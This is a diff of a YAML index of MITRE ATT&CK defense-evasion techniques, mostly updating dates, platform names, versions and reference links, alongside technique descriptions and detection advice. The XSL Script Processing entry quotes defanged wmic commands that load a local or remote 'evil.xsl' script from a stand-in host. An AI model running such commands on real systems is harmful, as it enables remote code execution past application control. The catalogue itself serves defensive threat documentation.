       x_mitre_data_sources:
       - 'Process: Process Modification'
       - 'Process: OS API Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+      created: '2021-11-22T15:02:15.190Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1055/015
+        external_id: T1055.015
+      - source_name: Hexacorn Listplanting
+        description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+          trick. Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+      - source_name: ESET InvisiMole June 2020
+        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+      - source_name: Microsoft List View Controls
+        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+          January 4, 2022.
+        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+      - source_name: Modexp Windows Process Injection
+        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+          Retrieved November 15, 2021.'
+        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1055.015
     atomic_tests: []
   T1484:
     technique:
-      modified: '2024-04-19T04:27:31.884Z'
+      modified: '2024-10-15T15:55:32.946Z'
       name: Domain or Tenant Policy Modification
       description: "Adversaries may modify the configuration settings of a domain
         or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -13495,9 +13786,8 @@ defense-evasion:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '3.0'
+      - Identity Provider
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Deletion'
       - 'Active Directory: Active Directory Object Creation'
@@ -13554,8 +13844,8 @@ defense-evasion:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Sygnia Golden SAML
         description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
           Attack. Retrieved January 6, 2021.
@@ -13564,57 +13854,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1220:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Avneet Singh
-      - Casey Smith
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
-      created: '2018-10-17T00:14:20.652Z'
-      x_mitre_version: '1.2'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1220
-        url: https://attack.mitre.org/techniques/T1220
-      - source_name: Reaqta MSXSL Spearphishing MAR 2018
-        url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
-        description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
-          MSXSL. Retrieved July 3, 2018.
-      - source_name: Twitter SquiblyTwo Detection APR 2018
-        url: https://twitter.com/dez_/status/986614411711442944
-        description: Desimone, J. (2018, April 18). Status Update. Retrieved July
-          3, 2018.
-      - source_name: LOLBAS Wmic
-        url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
-        description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
-      - source_name: Microsoft msxsl.exe
-        url: https://www.microsoft.com/download/details.aspx?id=21714
-        description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
-          Retrieved July 3, 2018.
-      - source_name: Penetration Testing Lab MSXSL July 2017
-        url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
-        description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
-          July 3, 2018.
-      - source_name: XSL Bypass Mar 2019
-        url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
-        description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
-          Proxy Code Execution. Retrieved August 2, 2019.
-      - source_name: Microsoft XSLT Script Mar 2017
-        url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
-        description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
-          Using <msxsl:script>. Retrieved July 3, 2018.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-12T19:40:12.337Z'
+      name: XSL Script Processing
       description: |-
         Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
 
@@ -13632,29 +13876,73 @@ defense-evasion:
 
         * Local File: <code>wmic process list /FORMAT:evil[.]xsl</code>
         * Remote File: <code>wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”</code>
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: XSL Script Processing
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Avneet Singh
+      - Casey Smith
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.
 
         The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
-      kill_chain_phases:
-      - phase_name: defense-evasion
-        kill_chain_name: mitre-attack
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Process: Process Creation'
-      x_mitre_system_requirements:
-      - Microsoft Core XML Services (MSXML) or access to wmic.exe
       x_mitre_defense_bypassed:
       - Anti-virus
       - Digital Certificate Validation
       - Application Control
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_system_requirements:
+      - Microsoft Core XML Services (MSXML) or access to wmic.exe
+      type: attack-pattern
+      id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
+      created: '2018-10-17T00:14:20.652Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1220
+        external_id: T1220
+      - source_name: Reaqta MSXSL Spearphishing MAR 2018
+        description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
+          MSXSL. Retrieved July 3, 2018.
+        url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
+      - source_name: Twitter SquiblyTwo Detection APR 2018
+        description: Desimone, J. (2018, April 18). Status Update. Retrieved September
+          12, 2024.
+        url: https://x.com/dez_/status/986614411711442944
+      - source_name: LOLBAS Wmic
+        description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
+        url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
+      - source_name: Microsoft msxsl.exe
+        description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
+          Retrieved July 3, 2018.
+        url: https://www.microsoft.com/download/details.aspx?id=21714
+      - source_name: Penetration Testing Lab MSXSL July 2017
+        description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
+          July 3, 2018.
+        url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
+      - source_name: XSL Bypass Mar 2019
+        description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
+          Proxy Code Execution. Retrieved August 2, 2019.
+        url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
+      - source_name: Microsoft XSLT Script Mar 2017
+        description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
+          Using <msxsl:script>. Retrieved July 3, 2018.
+        url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1220
     atomic_tests: []
   T1564.001:
@@ -13687,7 +13975,7 @@ defense-evasion:
         description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware.
           Retrieved July 10, 2017.'
         source_name: WireLurker
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T22:32:25.985Z'
       name: 'Hide Artifacts: Hidden Files and Directories'
       description: |-
         Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (<code>dir /a</code> for Windows and <code>ls –a</code> for Linux and macOS).
@@ -13715,48 +14003,11 @@ defense-evasion:
       - Host forensic analysis
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1564.001
     atomic_tests: []
   T1578.001:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
-      type: attack-pattern
-      created: '2020-06-09T15:33:13.563Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.001
-        url: https://attack.mitre.org/techniques/T1578/001
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS Cloud Trail Backup API
-        url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
-        description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
-          Retrieved April 27, 2020.
-      - source_name: Azure - Monitor Logs
-        url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
-        description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
-          Retrieved May 1, 2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      - source_name: GCP - Creating and Starting a VM
-        url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
-        description: Google. (2020, April 23). Creating and Starting a VM instance.
-          Retrieved May 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:53:44.870Z'
       name: Create Snapshot
       description: |-
         An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.
@@ -13765,6 +14016,9 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.
 
@@ -13773,20 +14027,51 @@ defense-evasion:
         In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)
 
         Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the <code>gcloud compute instances create</code> command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the <code>"sourceSnapshot":</code> parameter pointed to <code>"global/snapshots/[BOOT_SNAPSHOT_NAME]</code>.(Citation: GCP - Creating and Starting a VM)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Snapshot: Snapshot Creation'
       - 'Snapshot: Snapshot Metadata'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
+      created: '2020-06-09T15:33:13.563Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/001
+        external_id: T1578.001
+      - source_name: AWS Cloud Trail Backup API
+        description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
+          Retrieved April 27, 2020.
+        url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
+      - source_name: GCP - Creating and Starting a VM
+        description: Google. (2020, April 23). Creating and Starting a VM instance.
+          Retrieved May 1, 2020.
+        url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure - Monitor Logs
+        description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
+          Retrieved May 1, 2020.
+        url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1550.001:
     technique:
-      modified: '2024-04-12T21:18:28.848Z'
+      modified: '2024-10-15T15:38:11.583Z'
       name: Application Access Token
       description: "Adversaries may use stolen application access tokens to bypass
         the typical authentication process and access restricted accounts, information,
@@ -13843,6 +14128,7 @@ defense-evasion:
       - Dylan Silva, AWS Security
       - Jack Burns, HubSpot
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
         granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -13853,13 +14139,12 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - Containers
       - IaaS
-      - Azure AD
-      x_mitre_version: '1.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       x_mitre_defense_bypassed:
@@ -13918,11 +14203,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -13962,8 +14246,10 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -13971,13 +14257,13 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -14008,9 +14294,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests:
     - name: Azure Persistence Automation Runbook Created or Modified
@@ -14150,7 +14433,7 @@ defense-evasion:
         Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.
 
         Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-04T14:52:51.290Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Environmental Keying
       x_mitre_detection: Detecting the use of environmental keying may be difficult
@@ -14172,11 +14455,10 @@ defense-evasion:
       - Static File Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564.004:
     technique:
-      modified: '2024-02-14T21:56:34.831Z'
+      modified: '2024-09-12T15:27:29.615Z'
       name: 'Hide Artifacts: NTFS File Attributes'
       description: |-
         Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
@@ -14243,8 +14525,8 @@ defense-evasion:
           Retrieved March 21, 2018.
         url: https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/
       - source_name: Microsoft File Streams
-        description: Microsoft. (n.d.). File Streams. Retrieved December 2, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa364404
+        description: Microsoft. (n.d.). File Streams. Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/fileio/file-streams
       - source_name: Oddvar Moe ADS2 Apr 2018
         description: Moe, O. (2018, April 11). Putting Data in Alternate Data Streams
           and How to Execute It - Part 2. Retrieved June 30, 2018.
@@ -14262,7 +14544,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.004
     atomic_tests: []
   T1055.001:
@@ -14365,12 +14646,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.001
     atomic_tests: []
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -14383,6 +14663,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -14419,17 +14700,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -14475,9 +14756,6 @@ defense-evasion:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1216:
     technique:
@@ -14515,7 +14793,7 @@ defense-evasion:
         behavior may be abused by adversaries to execute malicious files that could
         bypass application control and signature validation on systems.(Citation:
         GitHub Ultimate AppLocker Bypass List)'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-18T14:43:46.045Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Signed Script Proxy Execution
       x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -14534,7 +14812,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1216
     atomic_tests: []
   T1556.004:
@@ -14565,7 +14842,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -14589,12 +14866,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -14678,7 +14953,6 @@ defense-evasion:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1601.002:
     technique:
@@ -14700,7 +14974,7 @@ defense-evasion:
         url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
         description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
           IOS devices. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:49:02.660Z'
       name: Downgrade System Image
       description: "Adversaries may install an older version of the operating system
         of a network device to weaken security.  Older operating system versions on
@@ -14734,12 +15008,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -14791,9 +15063,8 @@ defense-evasion:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests: []
   T1211:
@@ -14862,7 +15133,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1127:
     technique:
@@ -14909,7 +15179,7 @@ defense-evasion:
         legitimate certificates that allow them to execute on a system and proxy execution
         of malicious code through a trusted process that effectively bypasses application
         control solutions.'
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:00:37.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Trusted Developer Utilities Proxy Execution
       x_mitre_detection: |-
@@ -14922,12 +15192,13 @@ defense-evasion:
       x_mitre_is_subtechnique: false
       x_mitre_data_sources:
       - 'Command: Command Execution'
+      - 'Module: Module Load'
+      - 'Process: Process Metadata'
       - 'Process: Process Creation'
       x_mitre_defense_bypassed:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1127
     atomic_tests: []
   T1218.014:
@@ -15006,7 +15277,7 @@ defense-evasion:
